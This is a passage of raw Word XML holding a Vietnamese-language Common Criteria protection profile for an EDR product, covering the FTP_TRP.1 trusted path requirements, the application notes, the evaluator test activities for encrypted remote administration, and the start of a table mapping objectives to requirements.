      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="05BF0D51" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11812490" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Đánh giá</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8789" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22645040" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Thử nghiệm 1:</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Đánh giá viên phải giả định rằng các thông tin liên lạc sử dụng từng phương thức truyền thông Agent-Server được chỉ định (trong hướng dẫn hoạt động) được kiểm tra trong quá trình đánh giá, thiết lập các kết nối như được mô tả trong hướng dẫn hoạt động và đảm bảo rằng giao tiếp thành công.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D6779F8" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Thử nghiệm 2:</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Đánh giá viên phải đảm bảo, cho từng phương pháp máy chủ ngoại vi thông tin liên lạc, dữ liệu kênh không được gửi bằng văn bản thuần túy.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D6E9766" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>9.3.5 FTP: Đường dẫn / Kênh đáng tin cậy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B2D5A8" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>9.3.5.1 FTP_TRP.1 Đường dẫn Tin cậy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BB714F" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FTP_TRP.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9C7982" w14:textId="77777777" w:rsidR="00715386" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tinh chỉnh:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00715386">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>EDR</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> phải [</w:t>
      </w:r>
      <w:r w:rsidRPr="00715386">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>lựa chọn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69922D94" w14:textId="77777777" w:rsidR="00715386" w:rsidRPr="008B0249" w:rsidRDefault="00715386" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B0249">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="008B0249">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>thực hiện [</w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="008B0249">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>lựa chọn</w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="008B0249">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">: TLS như được định nghĩa trong Gói TLS, HTTPS như được định nghĩa trong </w:t>
      </w:r>
      <w:r w:rsidR="00475C38" w:rsidRPr="008B0249">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Hồ sơ bảo vệ cơ sở</w:t>
      </w:r>
      <w:r w:rsidRPr="008B0249">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15442F8C" w14:textId="6AC17A03" w:rsidR="00715386" w:rsidRPr="00715386" w:rsidRDefault="00715386" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B0249">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="008B0249">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>gọi chức năng do nền tảng cung cấp cho [</w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="008B0249">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>lựa chọn</w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="008B0249">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">: TLS, HTTPS] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F6D764" w14:textId="4427B803" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00715386" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00715386">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="00715386">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>để</w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> cung cấp một đường dẫn giao tiếp giữa chính nó và các quản trị viên từ xa khác biệt về mặt logic và cung cấp xác định chắc chắn về các điểm cuối của nó và bảo vệ dữ liệu được truyền đạt khỏi [</w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="00715386">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sửa đổi, tiết lộ</w:t>
      </w:r>
      <w:r w:rsidR="00D63D1D" w:rsidRPr="00204C5F">
        <w:t>].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B1DC30" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FTP_TRP.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C58F481" w14:textId="577771E7" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tinh chỉnh:</w:t>
      </w:r>
      <w:r w:rsidR="00A752BA" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A752BA" w:rsidRPr="008B0249">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>EDR</w:t>
      </w:r>
      <w:r w:rsidR="00A752BA" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00715386">
        <w:t>phải</w:t>
      </w:r>
      <w:r w:rsidR="00A752BA" w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidR="00A752BA" w:rsidRPr="00715386">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>lựa chọn</w:t>
      </w:r>
      <w:r w:rsidR="00A752BA" w:rsidRPr="00204C5F">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008B0249">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>thực hiện chức năng, gọi chức năng do nền tảng cung cấp</w:t>
      </w:r>
      <w:r w:rsidRPr="008B0249">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00715386">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> để</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> cho phép [</w:t>
      </w:r>
      <w:r w:rsidRPr="00715386">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>quản trị viên từ xa</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>] bắt đầu giao tiếp thông qua đường dẫn đáng tin cậy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA8D540" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FTP_TRP.1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5709D0AA" w14:textId="6A77E91E" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tinh chỉnh:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00715386">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>EDR</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00715386">
        <w:t>phải</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidRPr="00715386">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>lựa chọn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="008B0249">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>thực hiện chức năng, gọi chức năng do nền tảng cung cấp</w:t>
      </w:r>
      <w:r w:rsidRPr="008B0249">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00715386">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> để</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> yêu cầu sử dụng đường dẫn đáng tin cậy cho [</w:t>
      </w:r>
      <w:r w:rsidRPr="00715386">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>một hành động quản trị từ xa</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t>].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E96F07C" w14:textId="4708C081" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lưu ý áp dụng:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> Yêu cầu này đảm bảo rằng các quản trị viên từ xa được ủy quyền bắt đầu tất cả các giao tiếp với EDR thông qua một đường dẫn đáng tin cậy và tất cả các giao tiếp với EDR bởi các quản trị viên từ xa được thực hiện trên đường dẫn đó. Dữ liệu được truyền trong kênh truyền thông đáng tin cậy này được mã hóa như được định nghĩa trong giao thức được chọn trong lựa chọn đầu tiên. Tác giả ST chọn cơ chế hoặc cơ chế được hỗ trợ bởi EDR.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563"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="6ACA40F2" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33CB5A33" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Hoạt động</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8647" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B50188B" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Hoạt động đảm bảo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="4743F18B" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C2A6372" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>TSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8647" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3135FD08" w14:textId="19C3E416" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Đánh giá viên phải kiểm tra TSS để xác minh cách bảo vệ thông tin liên lạc quản trị từ xa và phù hợp với  SFR. Đánh giá viên</w:t>
            </w:r>
            <w:r w:rsidR="00C42841" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t xml:space="preserve"> phải kiểm tra </w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>TSS để xác định rằng các phương pháp quản trị TOE từ xa được chỉ định, cùng với cách các thông tin liên lạc đó được bảo vệ. Đánh giá viên cũng sẽ xác nhận rằng tất cả các giao thức được liệt kê trong TSS để hỗ trợ quản trị TOE phù hợp với các giao thức được chỉ định trong yêu cầu và được bao gồm trong các yêu cầu trong  ST.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F38F60B" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Nếu "gọi nền tảng cung cấp chức năng cho..." được chọn trong FTP_TRP.1.1, Đánh giá viên phải xác minh TSS chứa các cuộc gọi đến nền tảng  mà TOE đang tận dụng để gọi chức năng.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="5F24F9E3" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14962A8E" w14:textId="127EE8D6" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00DE3774" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hướng dẫn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8647" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FEB40E2" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Đánh giá viên phải xác nhận rằng hướng dẫn hoạt động chứa các hướng dẫn để thiết lập các phiên xác nhận từ xa cho từng phương pháp được hỗ trợ.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="29DB46B0" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="289366DD" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Đánh giá</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8647" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39DDE741" w14:textId="59BA0BBD" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Thử nghiệm 1:</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Các </w:t>
            </w:r>
            <w:r w:rsidR="00217303" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Đánh giá viên</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> phải đảm bảo rằng thông tin liên lạc sử dụng từng phương pháp quản trị từ xa được chỉ định (trong hướng dẫn hoạt động) được kiểm tra trong quá trình đánh giá, thiết lập các đối số như được mô tả trong hướng dẫn hoạt động và đảm bảo rằng giao tiếp thành công.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10FD8095" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Thử nghiệm 2:</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Đối với mỗi phương pháp quản trị từ xa được hỗ trợ, Đánh giá viên phải tuân theo hướng dẫn hoạt động để đảm bảo rằng người dùng từ xa không thể sử dụng giao diện có sẵn để thiết lập các phiên quản trị từ xa mà không cần gọi đường dẫn đáng tin cậy.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="683A910B" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Thử nghiệm 3:</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">  Đánh giá viên phải đảm bảo, đối với mỗi phương pháp quản trị từ xa, dữ liệu kênh không được gửi bằng văn bản thuần túy.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F519E59" w14:textId="2F8E2EF7" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Hinhve"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">9.4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve">Đặc điểm về các yêu cầu chức năng </w:t>
      </w:r>
      <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
        <w:t>an toàn</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:t xml:space="preserve"> TOE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5934A947" w14:textId="06F52620" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
      <w:pPr>
        <w:pStyle w:val="Hinhve"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Các đặc điểm sau đây cung cấp giải thích cho từng mục tiêu an toàn của TOE, cho thấy rằng các SFR phù hợp để đáp ứng và đạt được các mục tiêu an toàn:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2869"/>
        <w:gridCol w:w="2698"/>
        <w:gridCol w:w="4188"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D448F0" w:rsidRPr="00204C5F" w14:paraId="71147654" w14:textId="77777777" w:rsidTr="00D448F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2869" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33C40178" w14:textId="77777777" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>ĐỐI TƯỢNG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2698" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DBF49F8" w14:textId="4CF758DE" w:rsidR="004E5EB8" w:rsidRPr="00204C5F" w:rsidRDefault="004E5EB8" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>XÁC ĐỊNH BỞI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4188" w:type="dxa"/>
          </w:tcPr>
